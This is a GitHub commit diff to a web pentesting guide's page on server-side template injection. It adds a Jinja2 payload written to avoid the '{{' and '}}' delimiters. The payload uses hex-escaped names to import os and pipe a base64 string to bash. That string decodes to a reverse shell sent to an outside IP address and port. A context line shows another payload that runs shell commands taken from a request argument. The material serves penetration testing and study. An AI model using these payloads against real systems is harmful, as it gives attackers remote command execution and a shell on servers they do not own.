You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardExpand all lines: pentesting-web/ssti-server-side-template-injection/README.md
+6
Original file line number
Diff line number
Diff line change
@@ -606,6 +606,12 @@ Simply modification of payload to clean up output and facilitate command input \
606
606
{%for x in ().__class__.__base__.__subclasses__() %}{%if"warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
607
607
```
608
608
609
+
**ExploitSSTI without "{{" and "}}"**
610
+
611
+
```python
612
+
{% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40LzkwMDEgMD4mMQ== | base64 -d | bash")["read"]() %} a {% endwith %}
613
+
```
614
+
609
615
**Exploit the SSTI by writing an evil config file.**
0 commit comments